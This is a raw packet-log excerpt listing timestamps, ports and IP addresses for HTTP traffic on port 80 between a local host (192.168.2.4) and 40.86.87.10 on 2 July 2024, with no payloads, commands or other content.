Jul 2, 2024 07:31:13.306328058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306345940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306368113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306485891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306497097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306507111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306515932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306525946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306528091 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306535959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306546926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306549072 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306582928 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.336595058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.336657047 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.336658001 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.336695910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.336724043 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.336738110 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.336751938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.336764097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.336770058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.336780071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.336786032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.336807013 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.336842060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.336975098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.336987019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337029934 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337121964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337132931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337143898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337155104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337162018 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337167025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337181091 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337212086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337407112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337418079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337429047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337440968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337447882 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337452888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337464094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337476015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337477922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337488890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337505102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337526083 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337781906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337793112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337804079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337816000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337821007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337833881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.337836027 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337853909 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.337877035 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.363588095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.363687038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.363698959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.363775015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.363785982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.363795996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.363806963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.363817930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364087105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364098072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364108086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364119053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364134073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364145041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364156961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364166975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364177942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364188910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364550114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364562988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364573956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364737988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364748955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364758968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364770889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364782095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364793062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364803076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364814997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.364825964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.366394043 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392254114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392297983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392307997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392308950 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392333984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392353058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392406940 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392417908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392429113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392441034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392451048 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392488003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392560959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392576933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392587900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392600060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392604113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392612934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392625093 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392652988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392791986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392802954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392812967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.392826080 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392851114 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.392862082 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393043995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393054962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393065929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393075943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393085957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393094063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393105030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393105984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393116951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393129110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393132925 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393145084 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393172026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393338919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393351078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393381119 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393392086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393460035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393471003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393482924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393495083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393501043 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393507004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393517017 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393517971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393528938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393529892 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393539906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393563032 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393596888 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393891096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393902063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393913031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393924952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393935919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393935919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.393944025 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.393976927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.396332026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396384954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396384954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.396397114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396543980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396554947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396564960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396568060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.396575928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396588087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396589041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.396610975 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.396621943 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.396699905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396718025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396740913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.396770954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.396850109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396859884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396871090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.396888971 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.396907091 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.397063971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.397077084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.397088051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.397099018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.397104979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.397110939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.397120953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.397123098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.397154093 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.397371054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.397382975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.397394896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.397403955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.397413969 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.397444010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427299976 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427352905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427352905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427364111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427386045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427403927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427489042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427500963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427510977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427524090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427530050 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427552938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427581072 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427671909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427683115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427711010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427738905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427845001 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427856922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427867889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427879095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427889109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427889109 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427901030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427912951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427922964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.427926064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427943945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.427968025 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.428154945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428164959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428193092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.428241968 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.428265095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428277016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428287983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428303957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428306103 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.428314924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428320885 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.428325891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428337097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428345919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.428349018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428360939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428371906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.428376913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.428386927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.428432941 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.454338074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454348087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454356909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454374075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454382896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454392910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454405069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454408884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.454416037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454468966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.454659939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454669952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454680920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454689980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454699993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454701900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.454711914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454721928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454731941 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.454765081 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.454932928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454943895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.454971075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.455003977 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.455008984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455019951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455029964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455039978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455049992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455051899 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.455087900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.455367088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455377102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455387115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455399990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455410004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.455410004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455430031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.455457926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.455535889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.455583096 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.482748985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.482769966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.482780933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.482810974 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.482842922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.482912064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.482923031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.482933998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.482945919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.482954025 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.482969046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.482999086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483064890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483109951 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483138084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483150005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483161926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483171940 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483179092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483182907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483205080 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483234882 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483400106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483412027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483426094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483437061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483448029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483450890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483458042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483479977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483483076 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483509064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483530045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483675957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483686924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483716011 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483721018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483731031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483731985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.483760118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.483769894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.484375954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484388113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484399080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484410048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484421968 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.484422922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484433889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484441042 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.484445095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484453917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484466076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484472036 CEST	49730	80	192.168.2.4	40.86.87.10
